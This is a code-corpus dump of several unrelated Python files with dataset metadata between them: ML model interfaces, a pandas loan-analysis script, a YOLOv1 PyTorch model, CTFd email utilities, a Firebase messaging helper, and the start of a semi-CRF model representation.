    ctor = BASELINE_SEQ2SEQ_ENCODERS.get(kwargs.get('encoder_type', 'default'))
    return ctor(**kwargs)
@exporter
def create_seq2seq_arc_policy(**kwargs):
    """Instantiate the registered arc policy ('arc_policy_type', default 'default')."""
    ctor = BASELINE_SEQ2SEQ_ARC_POLICY.get(kwargs.get('arc_policy_type', 'default'))
    return ctor()
@exporter
def create_seq2seq_model(embeddings, labels, **kwargs):
    """Create a seq2seq model; thin wrapper over :func:`create_model_for`."""
    return create_model_for('seq2seq', embeddings, labels, **kwargs)
@exporter
def create_lang_model(embeddings, **kwargs):
    """Create a language model; the 'lm' task takes no output/labels argument."""
    return create_model_for('lm', embeddings, None, **kwargs)
@exporter
def load_model_for(activity, filename, **kwargs):
    """Reload a persisted model for *activity* via its registered loader."""
    # Sniff the saved state to see if a user module needs importing first.
    state = read_json('{}.state'.format(filename))
    # There won't be a module for pytorch (there is no state file to load).
    if 'module' in state:
        import_user_module(state['module'])
    # Caller-supplied type wins (back compat with the old api); otherwise
    # fall back to the type recorded in the state file, then to 'default'.
    # TODO: Currently in pytorch all models are always reloaded with the load
    # classmethod with a default model class. This is fine given how simple pyt
    # loading is but it could cause problems if a model has a custom load
    saved_type = state.get('type', state.get('model_type', 'default'))
    model_type = kwargs.get('type', kwargs.get('model_type', saved_type))
    loader = BASELINE_LOADERS[activity][model_type]
    logger.info('Calling model %s', loader)
    return loader(filename, **kwargs)
@exporter
def load_model(filename, **kwargs):
    """Reload a classifier; thin wrapper over :func:`load_model_for`."""
    return load_model_for('classify', filename, **kwargs)
@exporter
def load_tagger_model(filename, **kwargs):
    """Reload a tagger; thin wrapper over :func:`load_model_for`."""
    return load_model_for('tagger', filename, **kwargs)
@exporter
def load_seq2seq_model(filename, **kwargs):
    """Reload a seq2seq model; thin wrapper over :func:`load_model_for`."""
    return load_model_for('seq2seq', filename, **kwargs)
@exporter
def load_lang_model(filename, **kwargs):
    """Reload a language model; thin wrapper over :func:`load_model_for`."""
    return load_model_for('lm', filename, **kwargs)
@exporter
class ClassifierModel(object):
    """Text classifier
    Provide an interface to DNN classifiers that use word lookup tables.
    """
    task_name = 'classify'
    def __init__(self):
        super(ClassifierModel, self).__init__()
    def save(self, basename):
        """Save this model out
        :param basename: Name of the model, not including suffixes
        :return: None
        """
        pass
    @classmethod
    def load(cls, basename, **kwargs):
        """Load the model from a basename, including directory
        :param basename: Name of the model, not including suffixes
        :param kwargs: Anything that is useful to optimize experience for a specific framework
        :return: A newly created model
        """
        pass
    def predict(self, batch_dict):
        """Classify a batch of text with whatever features the model can use from the batch_dict.
        The indices correspond to get_vocab().get('word', 0)
        :param batch_dict: This normally contains `x`, a `BxT` tensor of indices. Some classifiers and readers may
        provide other features
        :return: A list of lists of tuples (label, value)
        """
        pass
    # deprecated: use predict
    def classify(self, batch_dict):
        """Deprecated alias for :meth:`predict`; logs a warning and delegates."""
        logger.warning('`classify` is deprecated, use `predict` instead.')
        return self.predict(batch_dict)
    def get_labels(self):
        """Return a list of labels, where the offset within the list is the location in a confusion matrix, etc.
        :return: A list of the labels for the decision
        """
        pass
@exporter
class TaggerModel(object):
    """Structured prediction classifier, AKA a tagger
    This class takes a temporal signal, represented as words over time, and characters of words
    and generates an output label for each time. This type of model is used for POS tagging or any
    type of chunking (e.g. NER, POS chunks, slot-filling)
    """
    task_name = 'tagger'
    def __init__(self):
        super(TaggerModel, self).__init__()
    def save(self, basename):
        """Persist the model under *basename* (no suffixes); framework-specific."""
        pass
    @staticmethod
    def load(basename, **kwargs):
        """Restore a tagger previously written by :meth:`save`."""
        pass
    def predict(self, batch_dict):
        """Return one label per timestep for each example in *batch_dict*."""
        pass
    def get_labels(self):
        """Return the ordered list of output labels."""
        pass
@exporter
class LanguageModel(object):
    """Abstract interface for language models."""
    task_name = 'lm'
    def __init__(self):
        super(LanguageModel, self).__init__()
    @staticmethod
    def load(basename, **kwargs):
        """Restore a language model previously saved under *basename*."""
        pass
    @classmethod
    def create(cls, embeddings, **kwargs):
        """Build a new language model over the given embeddings."""
        pass
    def predict(self, batch_dict, **kwargs):
        """Score the model's output distribution for the inputs in *batch_dict*."""
        pass
@exporter
class EncoderDecoderModel(object):
    """Abstract interface for sequence-to-sequence (encoder/decoder) models."""
    task_name = 'seq2seq'
    def save(self, model_base):
        """Persist the model under *model_base*; framework-specific."""
        pass
    def __init__(self, *args, **kwargs):
        super(EncoderDecoderModel, self).__init__()
    @staticmethod
    def load(basename, **kwargs):
        """Restore a seq2seq model previously saved under *basename*."""
        pass
    @classmethod
    def create(cls, src_embeddings, dst_embedding, **kwargs):
        """Build a new model from source and target embeddings."""
        pass
    def create_loss(self):
        """Return the training loss for this model."""
        pass
    def predict(self, source_dict, **kwargs):
        """Decode target sequences for the inputs in *source_dict*."""
        pass
    # deprecated: use predict
    def run(self, source_dict, **kwargs):
        """Deprecated alias for :meth:`predict`; logs a warning and delegates."""
        logger.warning('`run` is deprecated, use `predict` instead.')
        return self.predict(source_dict, **kwargs)
|
en
| 0.859204
|
Register a function as a plug-in Register a function as a plug-in Register a function as a plug-in Register a function as a plug-in # Sniff state to see if we need to import things # There won't be a module for pytorch (there is no state file to load). # Allow user to override model type (for back compat with old api), backoff # to the model type in the state file or to default. # TODO: Currently in pytorch all models are always reloaded with the load # classmethod with a default model class. This is fine given how simple pyt # loading is but it could cause problems if a model has a custom load Text classifier Provide an interface to DNN classifiers that use word lookup tables. Save this model out :param basename: Name of the model, not including suffixes :return: None Load the model from a basename, including directory :param basename: Name of the model, not including suffixes :param kwargs: Anything that is useful to optimize experience for a specific framework :return: A newly created model Classify a batch of text with whatever features the model can use from the batch_dict. The indices correspond to get_vocab().get('word', 0) :param batch_dict: This normally contains `x`, a `BxT` tensor of indices. Some classifiers and readers may provide other features :return: A list of lists of tuples (label, value) # deprecated: use predict Return a list of labels, where the offset within the list is the location in a confusion matrix, etc. :return: A list of the labels for the decision Structured prediction classifier, AKA a tagger This class takes a temporal signal, represented as words over time, and characters of words and generates an output label for each time. This type of model is used for POS tagging or any type of chunking (e.g. NER, POS chunks, slot-filling) # deprecated: use predict
| 2.215983
| 2
|
-Loan-Approval-Analysis-/code.py
|
amrapali10/ga-learner-dsmp-repo
| 0
|
6627602
|
<reponame>amrapali10/ga-learner-dsmp-repo
# --------------
# Import packages
import numpy as np
import pandas as pd
from scipy.stats import mode

# Load the loan dataset.
# NOTE(review): `path` is expected to be injected by the hosting
# environment; it is not defined in this file -- verify before running.
df = pd.read_csv(path)
bank = pd.DataFrame(df)
# Separate categorical (object dtype) from numerical columns.
categorical_var = df.select_dtypes(include='object')
print(categorical_var)
print('=' * 50)
numerical_var = df.select_dtypes(include='number')
print(numerical_var)

# --------------
# Drop the identifier column, then impute every column's missing values
# with that column's mode.
banks = bank.drop('Loan_ID', axis=1)
print(banks.isnull().sum())
print('=' * 50)
bank_mode = banks.mode()
for column in banks.columns:
    banks[column].fillna(banks[column].mode()[0], inplace=True)
print(banks)

# --------------
# Average loan amount by gender, marital and employment status.
avg_loan_amount = pd.pivot_table(banks, index=['Gender', 'Married', 'Self_Employed'],
                                 values='LoanAmount', aggfunc=np.mean)
print(avg_loan_amount)

# --------------
# Approval rates for self-employed vs. non-self-employed applicants.
loan_approved_se = len(banks[(banks['Self_Employed'] == 'Yes') & (banks['Loan_Status'] == 'Y')])
print(loan_approved_se)
print('=' * 50)
loan_approved_nse = len(banks[(banks['Self_Employed'] == 'No') & (banks['Loan_Status'] == 'Y')])
print(loan_approved_nse)
print('=' * 50)
# Fixed: the total was hard-coded to 614; derive it from the data so the
# script works for any sized dataset.
Loan_Status = len(banks)
percentage_se = loan_approved_se / Loan_Status * 100
print(percentage_se)
print('=' * 50)
percentage_nse = loan_approved_nse / Loan_Status * 100
print(percentage_nse)

# --------------
# Convert the loan term from months to years; count terms of 25+ years.
loan_term = banks['Loan_Amount_Term'].apply(lambda x: x / 12)
print(len(loan_term))
print('=' * 50)
big_loan_term = len(banks[loan_term >= 25])
print(big_loan_term)

# --------------
# Mean income and credit history per loan status.
# Fixed: select the columns with a list -- tuple indexing on a GroupBy is
# deprecated in pandas and raises in recent versions.
loan_groupby = banks.groupby('Loan_Status')[['ApplicantIncome', 'Credit_History']]
mean_values = loan_groupby.mean()
print(loan_groupby)
print('=' * 50)
print(mean_values)
# code ends here
|
# --------------
# Import packages
import numpy as np
import pandas as pd
from scipy.stats import mode
# code starts here
df = pd.read_csv(path)
bank = pd.DataFrame(df)
categorical_var = df.select_dtypes(include = 'object')
print(categorical_var)
print('='*50)
numerical_var = df.select_dtypes(include = 'number')
print(numerical_var)
# code ends here
# --------------
# code starts here
banks = bank.drop('Loan_ID', axis = 1)
print(banks.isnull().sum())
print('='*50)
bank_mode = banks.mode()
#print(bank_mode)
for column in banks.columns:
banks[column].fillna(banks[column].mode()[0], inplace=True)
#banks = banks.fillna(banks.mode())
print(banks)
#code ends here
# --------------
# Code starts here
avg_loan_amount = pd.pivot_table(banks, index=['Gender','Married','Self_Employed'],values = 'LoanAmount', aggfunc = np.mean)
print(avg_loan_amount)
# code ends here
# --------------
# code starts here
loan_approved_se = len( banks[(banks['Self_Employed'] == 'Yes') & (banks['Loan_Status'] == 'Y')])
print(loan_approved_se)
print('='*50)
loan_approved_nse = len(banks[(banks['Self_Employed'] == 'No') & (banks['Loan_Status']=='Y')])
print(loan_approved_nse)
print('='*50)
Loan_Status = 614
percentage_se = loan_approved_se/Loan_Status*100
print(percentage_se)
print('='*50)
percentage_nse = loan_approved_nse/Loan_Status*100
print(percentage_nse)
# code ends here
# --------------
# code starts here
loan_term = banks['Loan_Amount_Term'].apply(lambda x:x/12 )
print(len(loan_term))
print('='*50)
big_loan_term =len(banks[loan_term >= 25])
print(big_loan_term)
# code ends here
# --------------
# code starts here
loan_groupby = banks.groupby('Loan_Status')['ApplicantIncome','Credit_History']
mean_values = loan_groupby.mean()
print(loan_groupby)
print('='*50)
print(mean_values)
# code ends here
|
en
| 0.540579
|
# -------------- # Import packages # code starts here # code ends here # -------------- # code starts here #print(bank_mode) #banks = banks.fillna(banks.mode()) #code ends here # -------------- # Code starts here # code ends here # -------------- # code starts here # code ends here # -------------- # code starts here # code ends here # -------------- # code starts here # code ends here
| 3.031501
| 3
|
Labs/Lab07/src/laplacian.py
|
ethank5149/PurduePHYS580
| 0
|
6627603
|
<reponame>ethank5149/PurduePHYS580
from numba import jit
import numpy as np
@jit
def laplacian_1d(n):
    """Dense 1-D Laplacian (tridiagonal 2/-1) over the n-2 interior points."""
    m = n - 2
    return 2.0 * np.eye(m) - np.eye(m, k=1) - np.eye(m, k=-1)
@jit
def laplacian_2d(n):
    """Dense 2-D Laplacian as the Kronecker sum of two 1-D operators."""
    one_d = laplacian_1d(n)
    ident = np.eye(n - 2)
    return np.kron(ident, one_d) + np.kron(one_d, ident)
# from scipy.sparse import diags, kron, eye
# @jit
# def laplacian_1d(n):
# return diags([2 * np.ones(n - 2), -np.ones(n - 3), -np.ones(n - 3)], [0, 1, -1])
# @jit
# def laplacian_2d(n):
# return kron(eye(n - 2), laplacian_1d(n)) + \
# kron(laplacian_1d(n), eye(n - 2))
|
from numba import jit
import numpy as np
@jit
def laplacian_1d(n):
return np.diag(2 * np.ones(n - 2)) + \
np.diag(-np.ones(n - 3), 1) + \
np.diag(-np.ones(n - 3), -1)
@jit
def laplacian_2d(n):
return np.kron(np.eye(n - 2), laplacian_1d(n)) + \
np.kron(laplacian_1d(n), np.eye(n - 2))
# from scipy.sparse import diags, kron, eye
# @jit
# def laplacian_1d(n):
# return diags([2 * np.ones(n - 2), -np.ones(n - 3), -np.ones(n - 3)], [0, 1, -1])
# @jit
# def laplacian_2d(n):
# return kron(eye(n - 2), laplacian_1d(n)) + \
# kron(laplacian_1d(n), eye(n - 2))
|
en
| 0.204216
|
# from scipy.sparse import diags, kron, eye # @jit # def laplacian_1d(n): # return diags([2 * np.ones(n - 2), -np.ones(n - 3), -np.ones(n - 3)], [0, 1, -1]) # @jit # def laplacian_2d(n): # return kron(eye(n - 2), laplacian_1d(n)) + \ # kron(laplacian_1d(n), eye(n - 2))
| 2.711412
| 3
|
YOLOv1/model.py
|
aryaman4152/model-implementations-PyTorch
| 1
|
6627604
|
<gh_stars>1-10
import torch
import torch.nn as nn
class Convolution(nn.Module):
    """Conv2d followed by LeakyReLU(0.1), the basic unit used throughout YOLOv1."""

    def __init__(self, in_channels, out_channels, kernel_size, padding, stride):
        super(Convolution, self).__init__()
        self.conv = nn.Conv2d(in_channels=in_channels, out_channels=out_channels,
                              kernel_size=kernel_size, padding=padding,
                              stride=stride)
        self.Lrelu = nn.LeakyReLU(0.1)

    def forward(self, x):
        # Convolve, then apply the leaky activation.
        return self.Lrelu(self.conv(x))
class YOLOv1(nn.Module):
    """YOLOv1 detection network (Redmon et al., 2016).

    Takes a (N, 3, 448, 448) image batch and returns a (N, 7, 7, 30) grid
    of per-cell predictions.
    """
    def __init__(self):
        super(YOLOv1, self).__init__()
        self.pool = nn.MaxPool2d(kernel_size=2, stride=2)
        # Section 1
        # Tried all paddings from 0, 3 gives correct output shape
        self.section_1_conv = Convolution(in_channels=3, out_channels=64, kernel_size=7, padding=3, stride=2)
        # Section 2
        self.section_2_conv = Convolution(in_channels=64, out_channels=192, kernel_size=3, stride=1, padding='same') #not strided conv
        # Section 3
        self.section_3_conv = nn.ModuleList([
            Convolution(in_channels=192, out_channels=128, kernel_size=1, stride=1, padding='same'),
            Convolution(in_channels=128, out_channels=256, kernel_size=3, stride=1, padding='same'),
            Convolution(in_channels=256, out_channels=256, kernel_size=1, stride=1, padding='same'),
            Convolution(in_channels=256, out_channels=512, kernel_size=3, stride=1, padding='same')
        ])
        # section 4
        self.section_4_conv_1 = nn.ModuleList([
            Convolution(in_channels=512, out_channels=256, kernel_size=1, stride=1, padding='same'),
            Convolution(in_channels=256, out_channels=512, kernel_size=3, stride=1, padding='same')
        ])
        self.section_4_conv_2 = nn.ModuleList([
            Convolution(in_channels=512, out_channels=512, kernel_size=1, stride=1, padding='same'),
            Convolution(in_channels=512, out_channels=1024, kernel_size=3, stride=1, padding='same')
        ])
        # section 5
        self.section_5_conv_1 = nn.ModuleList([
            Convolution(in_channels=1024, out_channels=512, kernel_size=1, stride=1, padding='same'),
            Convolution(in_channels=512, out_channels=1024, kernel_size=3, stride=1, padding='same')
        ])
        self.section_5_conv_2 = nn.ModuleList([
            Convolution(in_channels=1024, out_channels=1024, kernel_size=3, stride=1, padding='same'),
            Convolution(in_channels=1024, out_channels=1024, kernel_size=3, stride=2, padding=1)
        ])
        # section 6: two *distinct* 3x3 convs. Fixed: the original built one
        # layer and applied it twice in forward(), sharing its weights
        # between the two applications.
        self.section_6_conv = Convolution(in_channels=1024, out_channels=1024, kernel_size=3, stride=1, padding='same')
        self.section_6_conv_2 = Convolution(in_channels=1024, out_channels=1024, kernel_size=3, stride=1, padding='same')
        # fc section
        self.fc = nn.Sequential(
            nn.Flatten(),
            nn.Linear(1024*7*7, 4096),
            nn.LeakyReLU(0.1),
            nn.Linear(4096, 7*7*30),
            nn.LeakyReLU(0.1)
        )

    def forward(self, x):
        x = self.section_1_conv(x)
        x = self.pool(x)
        x = self.section_2_conv(x)
        x = self.pool(x)
        for sec_3 in self.section_3_conv:
            x = sec_3(x)
        x = self.pool(x)
        # The 1x1/3x3 bottleneck pair of section 4 is repeated four times.
        for i in range(0, 4):
            for sec_4_1 in self.section_4_conv_1:
                x = sec_4_1(x)
        for sec_4 in self.section_4_conv_2:
            x = sec_4(x)
        x = self.pool(x)
        # The 1x1/3x3 pair of section 5 is repeated twice.
        for i in range(0, 2):
            for sec_5_1 in self.section_5_conv_1:
                x = sec_5_1(x)
        for sec_5 in self.section_5_conv_2:
            x = sec_5(x)
        x = self.section_6_conv(x)
        x = self.section_6_conv_2(x)
        x = self.fc(x)
        # Fixed: keep the batch dimension. Reshaping to (7, 7, 30) only
        # worked (silently) for a batch of size 1.
        x = torch.reshape(x, (-1, 7, 7, 30))
        return x
|
import torch
import torch.nn as nn
class Convolution(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, padding, stride):
super(Convolution, self).__init__()
self.conv = nn.Conv2d(in_channels=in_channels,
out_channels=out_channels,
kernel_size=kernel_size,
padding=padding,
stride=stride)
self.Lrelu = nn.LeakyReLU(0.1)
def forward(self, x):
x = self.conv(x)
x = self.Lrelu(x)
return x
class YOLOv1(nn.Module):
def __init__(self):
super(YOLOv1, self).__init__()
self.pool = nn.MaxPool2d(kernel_size=2, stride=2)
# Section 1
# Tried all paddings from 0, 3 gives correct output shape
self.section_1_conv = Convolution(in_channels=3, out_channels=64, kernel_size=7, padding=3, stride=2)
# Section 2
self.section_2_conv = Convolution(in_channels=64, out_channels=192, kernel_size=3, stride=1, padding='same') #not strided conv
# Section 3
self.section_3_conv = nn.ModuleList([
Convolution(in_channels=192, out_channels=128, kernel_size=1, stride=1, padding='same'),
Convolution(in_channels=128, out_channels=256, kernel_size=3, stride=1, padding='same'),
Convolution(in_channels=256, out_channels=256, kernel_size=1, stride=1, padding='same'),
Convolution(in_channels=256, out_channels=512, kernel_size=3, stride=1, padding='same')
])
# section 4
self.section_4_conv_1 = nn.ModuleList([
Convolution(in_channels=512, out_channels=256, kernel_size=1, stride=1, padding='same'),
Convolution(in_channels=256, out_channels=512, kernel_size=3, stride=1, padding='same')
])
self.section_4_conv_2 = nn.ModuleList([
Convolution(in_channels=512, out_channels=512, kernel_size=1, stride=1, padding='same'),
Convolution(in_channels=512, out_channels=1024, kernel_size=3, stride=1, padding='same')
])
# section 5
self.section_5_conv_1 = nn.ModuleList([
Convolution(in_channels=1024, out_channels=512, kernel_size=1, stride=1, padding='same'),
Convolution(in_channels=512, out_channels=1024, kernel_size=3, stride=1, padding='same')
])
self.section_5_conv_2 = nn.ModuleList([
Convolution(in_channels=1024, out_channels=1024, kernel_size=3, stride=1, padding='same'),
Convolution(in_channels=1024, out_channels=1024, kernel_size=3, stride=2, padding=1)
])
# section 6
self.section_6_conv = Convolution(in_channels=1024, out_channels=1024, kernel_size=3, stride=1, padding='same')
# fc section
self.fc = nn.Sequential(
nn.Flatten(),
nn.Linear(1024*7*7, 4096),
nn.LeakyReLU(0.1),
nn.Linear(4096, 7*7*30),
nn.LeakyReLU(0.1)
)
def forward(self, x):
x = self.section_1_conv(x)
x = self.pool(x)
x = self.section_2_conv(x)
x = self.pool(x)
for sec_3 in self.section_3_conv:
x = sec_3(x)
x = self.pool(x)
for i in range(0,4):
for sec_4_1 in self.section_4_conv_1:
x = sec_4_1(x)
for sec_4 in self.section_4_conv_2:
x = sec_4(x)
x = self.pool(x)
for i in range(0,2):
for sec_5_1 in self.section_5_conv_1:
x = sec_5_1(x)
for sec_5 in self.section_5_conv_2:
x = sec_5(x)
x = self.section_6_conv(x)
x = self.section_6_conv(x)
x = self.fc(x)
x = torch.reshape(x, (7,7,30)) # reshape output
return x
|
en
| 0.651285
|
# Section 1 # Tried all paddings from 0, 3 gives correct output shape # Section 2 #not strided conv # Section 3 # section 4 # section 5 # section 6 # fc section # reshape output
| 2.808194
| 3
|
scripts/min_max.py
|
BLZ11/data_stats
| 0
|
6627605
|
<reponame>BLZ11/data_stats<gh_stars>0
"""Fake module that supposedly computes the minimum and maximum values of dependent variable y"""
import numpy as np
def min_max(y_data):
    """Return the second-smallest and second-largest values of *y_data*.

    (Deliberately NOT the true min/max -- see the module docstring: this is
    a 'fake' implementation used to exercise testing.)
    """
    ordered = np.sort(y_data)
    # ordered[1] is the second-smallest, ordered[-2] the second-largest.
    return (ordered[1], ordered[-2])
|
"""Fake module that supposedly computes the minimum and maximum values of dependent variable y"""
import numpy as np
def min_max(y_data):
"""Calculate the second-to-last mininum and second-to-last maximum valuse of dependent variable y"""
sort_data = np.sort(y_data)
minimum = sort_data[1] # second-to-last mininum value
maximum = sort_data[sort_data.shape[0] - 2] # second-to-last maximum value
return (minimum, maximum)
|
en
| 0.687555
|
Fake module that supposedly computes the minimum and maximum values of dependent variable y Calculate the second-to-last mininum and second-to-last maximum valuse of dependent variable y # second-to-last mininum value # second-to-last maximum value
| 3.431555
| 3
|
CTFd/utils/email/__init__.py
|
AIica/Crypto-2020
| 0
|
6627606
|
<reponame>AIica/Crypto-2020
from flask import current_app as app, url_for
from CTFd.utils import get_config, get_app_config
from CTFd.utils.config import get_mail_provider, mailserver
from CTFd.utils.encoding import base64decode, base64encode
from CTFd.utils.email import mailgun, smtp
from itsdangerous import TimedSerializer, BadTimeSignature, Signer, BadSignature
import re
EMAIL_REGEX = r"(^[^@\s]+@[^@\s]+\.[^@\s]+$)"
def sendmail(addr, text):
    """Send *text* to *addr* through the configured mail provider."""
    backends = {'smtp': smtp.sendmail, 'mailgun': mailgun.sendmail}
    handler = backends.get(get_mail_provider())
    if handler is None:
        return False, "No mail settings configured"
    return handler(addr, text)
def forgot_password(email, team_name):
    """Email *email* a signed, time-limited password-reset link for *team_name*."""
    serializer = TimedSerializer(app.config['SECRET_KEY'])
    token = serializer.dumps(team_name)
    reset_url = url_for('auth.reset_password', _external=True)
    text = """Did you initiate a password reset? Click the following link to reset your password:
{0}/{1}
""".format(reset_url, base64encode(token))
    sendmail(email, text)
def verify_email_address(addr):
    """Email *addr* a signed, time-limited address-confirmation link."""
    serializer = TimedSerializer(app.config['SECRET_KEY'])
    token = serializer.dumps(addr)
    confirm_url = url_for('auth.confirm', _external=True)
    text = """Please click the following link to confirm your email address for {ctf_name}: {url}/{token}""".format(
        ctf_name=get_config('ctf_name'), url=confirm_url,
        token=base64encode(token))
    sendmail(addr, text)
def check_email_format(email):
    """Return True when *email* matches the module-level EMAIL_REGEX."""
    return re.match(EMAIL_REGEX, email) is not None
|
from flask import current_app as app, url_for
from CTFd.utils import get_config, get_app_config
from CTFd.utils.config import get_mail_provider, mailserver
from CTFd.utils.encoding import base64decode, base64encode
from CTFd.utils.email import mailgun, smtp
from itsdangerous import TimedSerializer, BadTimeSignature, Signer, BadSignature
import re
EMAIL_REGEX = r"(^[^@\s]+@[^@\s]+\.[^@\s]+$)"
def sendmail(addr, text):
provider = get_mail_provider()
if provider == 'smtp':
return smtp.sendmail(addr, text)
if provider == 'mailgun':
return mailgun.sendmail(addr, text)
return False, "No mail settings configured"
def forgot_password(email, team_name):
s = TimedSerializer(app.config['SECRET_KEY'])
token = s.dumps(team_name)
text = """Did you initiate a password reset? Click the following link to reset your password:
{0}/{1}
""".format(url_for('auth.reset_password', _external=True), base64encode(token))
sendmail(email, text)
def verify_email_address(addr):
s = TimedSerializer(app.config['SECRET_KEY'])
token = s.dumps(addr)
text = """Please click the following link to confirm your email address for {ctf_name}: {url}/{token}""".format(
ctf_name=get_config('ctf_name'),
url=url_for('auth.confirm', _external=True),
token=base64encode(token)
)
sendmail(addr, text)
def check_email_format(email):
return bool(re.match(EMAIL_REGEX, email))
|
en
| 0.829658
|
Did you initiate a password reset? Click the following link to reset your password: {0}/{1} Please click the following link to confirm your email address for {ctf_name}: {url}/{token}
| 2.428565
| 2
|
_unittests/ut_filehelper/test_winzipfile.py
|
Pandinosaurus/pyquickhelper
| 18
|
6627607
|
"""
@brief test log(time=2s)
@author <NAME>
"""
import sys
import os
import unittest
from pyquickhelper.loghelper import fLOG
from pyquickhelper.filehelper.winzipfile import WinZipFile
class TestWinZipFile(unittest.TestCase):
    """Checks that WinZipFile lists and reads the bundled test archive."""

    def test_winzipfile(self):
        fLOG(
            __file__,
            self._testMethodName,
            OutputPrint=__name__ == "__main__")
        folder = os.path.abspath(os.path.dirname(__file__))
        data = os.path.join(folder, "data", "loghelper.zip")
        count = 0
        with WinZipFile(data, "r") as f:
            for info in f.infolist():
                # Every archived name is expected to use forward slashes.
                self.assertIn("/", info.filename)
                content = f.read(info.filename)
                is_dir = info.filename.endswith("/")
                if not content and not is_dir and "__init__" not in info.filename:
                    raise Exception("empty file '{0}'".format(info.filename))
                count += 1
        self.assertTrue(count > 0)
if __name__ == "__main__":
unittest.main()
|
"""
@brief test log(time=2s)
@author <NAME>
"""
import sys
import os
import unittest
from pyquickhelper.loghelper import fLOG
from pyquickhelper.filehelper.winzipfile import WinZipFile
class TestWinZipFile(unittest.TestCase):
def test_winzipfile(self):
fLOG(
__file__,
self._testMethodName,
OutputPrint=__name__ == "__main__")
this = os.path.abspath(os.path.dirname(__file__))
data = os.path.join(this, "data", "loghelper.zip")
nb = 0
with WinZipFile(data, "r") as f:
names = f.infolist()
for name in names:
self.assertIn("/", name.filename)
c = f.read(name.filename)
if len(c) == 0 and not name.filename.endswith("/") and "__init__" not in name.filename:
raise Exception("empty file '{0}'".format(name.filename))
nb += 1
self.assertTrue(nb > 0)
if __name__ == "__main__":
unittest.main()
|
en
| 0.312813
|
@brief test log(time=2s) @author <NAME>
| 2.737492
| 3
|
firebase/fcm.py
|
BraydenKO/RamLife
| 3
|
6627608
|
<filename>firebase/fcm.py
# Firebase Admin SDK: app bootstrap plus the Cloud Messaging client.
from firebase_admin import initialize_app, credentials, messaging as FCM
print ("Initializing...")
# NOTE(review): `path` (the service-account key file) is not defined in
# this file -- presumably supplied by the embedding script; verify.
initialize_app (credentials.Certificate(path))
def get_message(command, topic):
    """Build an FCM data message for *topic* carrying *command*."""
    payload = {
        "command": command,
        "collapseKey": topic,
        "click_action": "FLUTTER_NOTIFICATION_CLICK",
    }
    return FCM.Message(data=payload, topic=topic)
def send_message(message):
    """Dispatch a previously built message via Firebase Cloud Messaging."""
    return FCM.send(message)
|
<filename>firebase/fcm.py
from firebase_admin import initialize_app, credentials, messaging as FCM
print ("Initializing...")
initialize_app (credentials.Certificate(path))
def get_message(command, topic): return FCM.Message(
data = {
"command": command,
"collapseKey": topic,
"click_action": "FLUTTER_NOTIFICATION_CLICK",
},
topic = topic
)
def send_message(message):
return FCM.send(message)
|
none
| 1
| 2.42345
| 2
|
|
pyseqlab/hosemi_crf_ad.py
|
bratao/-PySeqLab
| 6
|
6627609
|
"""
@author: <NAME> <<EMAIL>>
"""
import numpy
from .linear_chain_crf import LCRFModelRepresentation, LCRF
from .utilities import (
HOSemi_AStarSearcher,
vectorized_logsumexp,
generate_partitions,
generate_partition_boundaries,
)
class HOSemiCRFADModelRepresentation(LCRFModelRepresentation):
r"""Model representation that will hold data structures to be used in :class:`HOSemiCRF` class
Attributes:
P_codebook: set of proper prefixes of the elements in the set of patterns :attr:`Z_codebook`
e.g. {'':0, 'P':1, 'L':2, 'O':3, 'L|O':4, ...}
P_codebook_rev: reversed codebook of :attr:`P_codebook`
e.g. {0:'', 1:'P', 2:'L', 3:'O', 4:'L|O', ...}
P_len: dictionary comprising the length (i.e. number of elements) of elements in :attr:`P_codebook`
e.g. {'':0, 'P':1, 'L':1, 'O':1, 'L|O':2, ...}
P_elems: dictionary comprising the composing elements of every prefix in :attr:`P_codebook`
e.g. {'':('',), 'P':('P',), 'L':('L',), 'O':('O',), 'L|O':('L','O'), ...}
P_numchar: dictionary comprising the number of characters for every prefix in :attr:`P_codebook`
e.g. {'':0, 'P':1, 'L':1, 'O':1, 'L|O':3, ...}
f_transition: a dictionary representing forward transition data structure having the form:
{pi:{pky, (pk, y)}} where pi represents the longest prefix element in :attr:`P_codebook`
for pky (representing the concatenation of elements in :attr:`P_codebook` and :attr:`Y_codebook`)
pky_codebook: generate a codebook for the elements of the set PY (the product of set P and Y)
pi_pky_map: a map between P elements and PY elements
z_pky_map: a map between elements of the Z set and PY set
it has the form/template {ypattern:[pky_elements]}
z_pi_piy_map: a map between elements of the Z set and PY set
it has the form/template {ypattern:(pk, pky, pi)}
"""
    def __init__(self):
        """Initialize all derived maps to None; they are built by setup_model()."""
        # call super class
        super().__init__()
        # All attributes below are populated by generate_instance_properties().
        self.P_codebook = None
        self.P_codebook_rev = None
        self.P_len = None
        self.P_elems = None
        self.P_numchar = None
        self.f_transition = None
        self.pky_codebook = None
        self.pi_pky_map = None
        self.z_pky_map = None
        self.z_pi_piy_map = None
    def setup_model(self, modelfeatures, states, L):
        """setup and create the model representation

        Creates all maps and codebooks needed by the :class:`HOSemiCRFAD` class

        Args:
            modelfeatures: set of features defining the model
            states: set of states (i.e. tags)
            L: length of longest segment
        """
        # Delegates to the base class, which triggers
        # generate_instance_properties() to build the P/PY maps.
        super().setup_model(modelfeatures, states, L)
    def generate_instance_properties(self):
        """generate instance properties that will be later used by :class:`HOSemiCRFAD` class
        """
        super().generate_instance_properties()
        # Order matters: each map below depends on the ones built before it.
        self.P_codebook = self.get_forward_states()
        self.P_codebook_rev = self.get_P_codebook_rev()
        self.P_len, self.P_elems, self.P_numchar = self.get_P_info()
        self.f_transition = self.get_forward_transition()
        self.pky_codebook = self.get_pky_codebook()
        self.pi_pky_map = self.get_pi_pky_map()
        self.z_pky_map, self.z_pi_piy_map = self.map_pky_z()
def get_forward_states(self):
"""create set of forward states (referred to set P) and map each element to unique code
P is set of proper prefixes of the elements in :attr:`Z_codebook` set
"""
Y_codebook = self.Y_codebook
Z_elems = self.Z_elems
Z_len = self.Z_len
P = {}
for z_patt in Z_elems:
elems = Z_elems[z_patt]
z_len = Z_len[z_patt]
for i in range(z_len - 1):
P["|".join(elems[: i + 1])] = 1
for y in Y_codebook:
P[y] = 1
# empty element
P[""] = 1
P_codebook = {s: i for (i, s) in enumerate(P)}
# print("P_codebook ", P_codebook)
return P_codebook
def get_P_codebook_rev(self):
"""generate reversed codebook of :attr:`P_codebook`
"""
P_codebook = self.P_codebook
P_codebook_rev = {code: pi for pi, code in P_codebook.items()}
return P_codebook_rev
def get_P_info(self):
"""get the properties of P set (proper prefixes)
"""
P_codebook = self.P_codebook
P_len = {}
P_numchar = {}
P_elems = {}
for pi in P_codebook:
elems = pi.split("|")
P_elems[pi] = elems
